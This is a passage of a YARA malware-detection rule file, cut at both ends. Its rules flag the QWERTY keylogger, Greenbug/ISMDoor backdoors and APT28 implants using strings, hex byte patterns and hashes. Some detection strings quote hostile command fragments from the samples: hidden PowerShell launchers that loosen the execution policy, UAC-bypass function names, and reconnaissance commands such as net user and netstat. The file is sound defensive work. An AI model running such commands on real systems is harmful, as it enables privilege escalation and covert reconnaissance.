        $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
        $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
        $s4 = "<platform type=\"1\">" fullword ascii
        $s5 = "</plugin>" fullword ascii
        $s6 = "</pluginConfig>" fullword ascii
        $s7 = "<pluginConfig>" fullword ascii
        $s8 = "</platform>" fullword ascii
        $s9 = "</lpConfig>" fullword ascii
        $s10 = "<lpConfig>" fullword ascii
    condition:
        all of them
}

// QWERTY 20121 command-definition XML: error messages, error codes and plugin
// metadata; the definition continues below.
rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
    meta:
        description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
    strings:
        $s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
        $s1 = "<message>Failed to get File Time</message>" fullword ascii
        $s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
        $s3 = "<message>Failed to set File Time</message>" fullword ascii
        $s4 = "</commands>" fullword ascii
        $s5 = "<commands>" fullword ascii
        $s6 = "</version>" fullword ascii
        $s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
        $s8 = "<message>No Comms. 
with Driver</message>" fullword ascii
        $s9 = "</error>" fullword ascii
        $s10 = "<message>Invalid File Size</message>" fullword ascii
        $s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
        $s12 = "<message>File Size Mismatch</message>" fullword ascii
        $s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
        $s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
        $s15 = "<dllDepend>None</dllDepend>" fullword ascii
        $s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
        $s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
        $s18 = "<minorType>0</minorType>" fullword ascii
        $s19 = "<code>00001002</code>" fullword ascii
        $s20 = "<code>00001001</code>" fullword ascii
    condition:
        // 12 of 21; $s4, $s5, $s6 and $s9 are generic tags, the rest are specific.
        12 of them
}

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2017-01-25
    Identifier: Greenbug Malware
*/

/* Rule Set ----------------------------------------------------------------- */

// Greenbug sample: two short non-dictionary fragments, both required, gated on
// the MZ header and a 400KB size cap.
rule Greenbug_Malware_1 {
    meta:
        description = "Detects Malware from Greenbug Incident"
        author = "Florian Roth"
        reference = "https://goo.gl/urp4CD"
        date = "2017-01-25"
        hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
    strings:
        $s1 = "vailablez" fullword ascii
        $s2 = "Sfouglr" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 400KB and all of them )
}

// Greenbug backdoor: "Bot" / "Ism" PDB paths, drop-file paths and C2-style
// URL and cookie-parsing strings. Inside an MZ file under 1000KB one $x* or
// any two strings suffice; for anything else three strings are needed. The
// definition continues below.
rule Greenbug_Malware_2 {
    meta:
        description = "Detects Backdoor from Greenbug Incident"
        author = "Florian Roth"
        reference = "https://goo.gl/urp4CD"
        date = "2017-01-25"
        hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
        hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
        hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
    strings:
        $x1 = "|||Command executed successfully" fullword ascii
        $x2 = "\\Release\\Bot Fresh.pdb" ascii
        $x3 = "C:\\ddd\\a1.txt" fullword wide
        $x4 = "Bots\\Bot5\\x64\\Release" ascii
        $x5 = "Bot5\\Release\\Ism.pdb" ascii
        $x6 = "Bot\\Release\\Ism.pdb" ascii
        $x7 = "\\Bot Fresh\\Release\\Bot" ascii
        $s1 =
"/Home/SaveFile?commandId=CmdResult=" fullword wide
        $s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
        // Regex-like pattern for a Set-Cookie header, stored as a literal string here.
        $s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
        // WQL query against the SecurityCenter AntiVirusProduct class (compare
        // the WMIC /Namespace:\\root\SecurityCenter line in Greenbug_Malware_5).
        $s4 = "SELECT * FROM AntiVirusProduct" fullword wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) or 2 of them ) ) or ( 3 of them )
}

// Greenbug backdoor, second variant (super_rule across two hashes): any single
// one of the PDB path or drop-file paths matches, with no header or size gate,
// so a hit in a non-executable should be checked for context.
rule Greenbug_Malware_3 {
    meta:
        description = "Detects Backdoor from Greenbug Incident"
        author = "Florian Roth"
        reference = "https://goo.gl/urp4CD"
        date = "2017-01-25"
        super_rule = 1
        hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
        hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
    strings:
        $x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii
        $x2 = "C:\\ddd\\wer2.txt" fullword wide
        // Same temp-file name as $s12 in Greenbug_Malware_4.
        $x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" fullword wide
    condition:
        1 of them
}

// ISMDoor backdoor: PowerShell launcher command lines, UAC-bypass function
// names and drop/temp paths (super_rule across two hashes). The definition
// continues below.
rule Greenbug_Malware_4 {
    meta:
        description = "Detects ISMDoor Backdoor"
        author = "Florian Roth"
        reference = "https://goo.gl/urp4CD"
        date = "2017-01-25"
        super_rule = 1
        hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
        hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
    strings:
        $s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
        $s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . 
\"" fullword ascii
        $s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
        $s4 = "taskkill /im winit.exe /f" fullword ascii
        // No modifiers: matched as ascii and not fullword, unlike its siblings.
        $s5 = "invoke-psuacme"
        $s6 = "-method oobe -payload \"\"" fullword ascii
        $s7 = "C:\\ProgramData\\stat2.dat" fullword wide
        $s8 = "Invoke-bypassuac" fullword ascii
        $s9 = "Start Keylog Done" fullword wide
        $s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
        $s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
        $s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
    condition:
        // One string suffices inside an MZ file under 2000KB; three are needed
        // for any other file type.
        ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
}

// Greenbug reconnaissance command lines (WMIC SecurityCenter query, net user,
// netstat) as embedded by the four listed samples (super_rule). Within the
// 2000KB cap the $o1 banner alone matches regardless of file type; the cmd
// lines additionally need the MZ header.
rule Greenbug_Malware_5 {
    meta:
        description = "Auto-generated rule - from files 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f, 44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49, 7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c, 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
        author = "Florian Roth"
        reference = "https://goo.gl/urp4CD"
        date = "2017-01-25"
        super_rule = 1
        hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
        hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
        hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
        hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
    strings:
        $x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
        $x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
        $x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" fullword ascii
        $o1 = "========================== (Net User) ==========================" ascii fullword
    condition:
        filesize < 2000KB and ( ( uint16(0) == 0x5a4d and 1 of them ) or $o1 )
}

/*
    Yara Rule Set
    Author: US CERT
    Date: 2017-02-10
    Identifier: US CERT Report on Grizzly Steppe - APT28/APT29
*/

import "pe"

/* Rule Set ----------------------------------------------------------------- */

// Downrage implant (APT28), code-pattern variant 1; the definition continues below.
rule IMPLANT_1_v1 {
    meta:
        description = "Downrage Implant 
by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_1_v2 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 } $STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81 80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_1_v3 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_1_v4 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 
32 04 0F 46 88 01 3B 75 0C 7C E0 } condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_1_v5 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 } $mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } /* TOO MANY FALSE POSITIVES rule IMPLANT_1_v6 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XORopcodes_eax = { 35 (22 07 15 0e|56 d7 a7 0a) } $XORopcodes_others = { 81 (F1|F2|F3|F4|F5|F6|F7) (22 07 15 0E|56 D7 A7 0A) } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025) and any of them } */ rule IMPLANT_1_v7 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF } condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v1 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 
6a 00 6a 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v2 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v3 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 } $STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 } $STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D ?? ?? 8D ?? ?? FE } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v4 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v5 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 
00 00 00 48 8B CC E8} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v6 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v7 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13 21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0 25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21 C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B } $s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD 88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90 60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5? ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v8 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 } $STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 
40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 } $STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA } $STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v9 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89 45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8 0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 
8B 55 08 8A CB 02 C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01 FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33 D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D 0C } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v10 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v11 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v12 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 
00 00 00 48 8B CC E8} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v13 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v14 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 } $STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 } $STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA } $STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 
41 0F AF CB C1 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v15 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 } $XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 } $XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v16 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7 75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $OBF_FUNCT } rule IMPLANT_2_v17 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 24108b44241c894424148b4424246836 } $STR2 = { 518d4ddc516a018bd08b4de4e8360400 } $STR3 = { e48178061591df75740433f6eb1a8b48 } $STR4 = { 33d2f775f88b45d402d903c641321c3a } $STR5 = { 006a0056ffd083f8ff74646a008d45f8 } condition: (uint16(0) == 0x5A4D) and 2 of them } rule IMPLANT_2_v18 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = 
"https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF 8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE 8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v19 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC 89 